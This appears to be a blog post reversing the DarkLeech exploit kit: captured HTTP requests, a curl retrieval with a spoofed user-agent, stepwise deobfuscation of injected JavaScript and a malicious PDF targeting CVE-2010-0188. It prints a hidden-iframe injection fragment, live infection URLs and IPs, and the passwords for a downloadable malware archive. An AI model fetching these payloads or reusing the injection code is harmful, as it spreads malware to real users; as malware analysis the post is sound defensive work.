Reversing The DarkLeech Exploit Kit

Hello again loyal readers!

I have a treat for you. I encountered an exploit kit while doing my malware thing and decided to try and get a better idea of what is going on start to finish.

I Watched a machine get exploited and fired up WireShark to watch:
GET http://68.178.166.11/2b01554de28f018745855a41166494db/lately-duplicate.php HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, (value not set), pronto/1.00.00, */*
Referer: http://www.thaiairwaysusa.com/
Accept-Language: en-us
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.2; .NET CLR 1.1.4322; InfoPath.1; MS-RTC LM 8)
Proxy-Connection: Keep-Alive
Host: 68.178.166.11
Pragma: no-cache

http://68.178.166.11/2b01554de28f018745855a41166494db/lately-duplicate.php is the infection URL

First thing you notice is if you try and visit the page with wget or lynx or curl, you get nothing:
[email protected]:~$ curl http://68.178.166.11/2b01554de28f018745855a41166494db/lately-duplicate.php

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /2b01554de28f018745855a41166494db/lately-duplicate.php was not found on this server.</p>
<hr>
<address>Apache/2.2.8 (Fedora) Server at 68.178.166.11 Port 80</address>
</body></html>

if you’re clever though, you’ll set the user agent string to something like oh i dont know, IE 5 and hope for the best:
[email protected]:~$ curl –user-agent “Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)” http://68.178.166.11/2b01554de28f018745855a41166494db/lately-duplicate.php|less
This returns a java script file.
Here is the file:
darkleech_first_js
Oh shoot, its encrypted. But fear not, we can decrypt this easily. How?
Just replace the eval function with document.write!
decryptme
This produced another javascript file.
here it is prettified:darkleech_decrypted
the code is a plugin detector for pdf files.
What stood out for me was the following:

 me ");pifr.setAttribute('width', 11);pifr.setAttribute('height', 12);pifr.setAttribute('style', "
                            top: 100px; position: absolute ");pifr.setAttribute('src', " / 8fad735e77b54494234fa5c82e5f4996 / breeding - lecture.php ? oocSsS = 2j2e542g53 & VMTIP = k & wuabRuEXEygOen = 2g55562e312f2j2j3155 & bHXKmoLg = 2d2b2d2b2d2b2d ");document.body.appendChild(pifr);}document.write('');setTimeout(end_redirect,61000);var javaver=window.pdpd.getVersion("

See it?
breeding – lecture.php ? oocSsS = 2j2e542g53 & VMTIP = k & wuabRuEXEygOen = 2g55562e312f2j2j3155 & bHXKmoLg = 2d2b2d2b2d2b2d
These are GET request values.
When I curl’d the site with these values, it sent me a file:
darkleech_pdf. Since I was being flagged by VirusTotal / WebSense, I’ve password protected the PDF file. the password is ‘gironsec’.

The PDF file (which I didn’t open and neither should you) contained several instances of FlateDecode streams.
A FlateDecode stream is a section of a PDF file that contains something embedded inside. I assumed this was the payload:
41 0 obj<>stream
H‰²±¯ÈÍQ(K-*ÎÌϳU2Ô3PRHÍKÎOÉÌK·U
qÓµP²·ã²©H)°b ê¼bËV)£¤¤ÀJ_?¯X/1%?)U/9?W(¡¯d`
endstream
endobj

Since a FlateStream is just zlib / DEFLATE encoding, I used a great little tool http://blog.didierstevens.com/programs/pdf-tools/ which ran against the pdf and showed me the true payload. More F’ing javascript. Of course its encrypted. Why wouldn’t it be?

darkleech_pdf_decoded
This one was more interesting to decode.

if(yy)xx=s[2]+"\\x61";
xx+="\\x6c";
if(yy){function XA(z,a,b){return ZA(a,b)};}
a=[XA(0,"7"[0],"16") etc etc etc

Broken down, the function does a string combine to form a hex character.

Do decrypt, we do:

function XA(z,a,b){
	return parseInt(a+b[1], 16)
}
a=[XA(0,"7","16"),XA(0,"6","11"),XA(0,"7","12"),XA(0,"2","10"), etc etc etc
	document.write(String.fromCharCode.apply(String, a));

The following html file decrypts:
Decryptagain

This produced another javascript file, this time what i think is the actual exploit.
It is here:
decoded_js_pdf
Surprise, its encoded!
The shell code, which trying to not look like shellcode is here:
(just did a binary paste into ollydbg and disassembled)
payload_shellcode_from_pdf

That was a crap load of work just to deliver an exploit. Not only that, I think I failed to disassemble / decrypt the final stage properly. I swear, the black hats are winning the war. They have more time on their hands.

All files here:
darkleech_stuff
password is ‘lolwut’.

The PDF exploit is trying to take advantage of this CVE: CVE-2010-0188.

Alt download malware URI in case they took the main one down:

GET http://174.142.235.1/c032df642295f9d35dee58bb00fd75cd/paintings-jumping.php HTTP/1.1::~~Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*::~~Accept-Language: en-au::~~User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; InfoPath.2; MS-RTC LM 8; .NET CLR 3.0.4
GET http://67.228.244.162/aa8b7a06fcf440a2dbc0981a2b8837c8/pointer-exhibits.php HTTP/1.1::~~Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*:~~Accept-Language: en-us::~~UA-CPU: x86::~~Accept-Encoding: gzip, deflate::~~User-Agent: Mozilla/4.0 (compatible; MSIE 7.0;

Stay safe!

Tka3P9j

Leave a Reply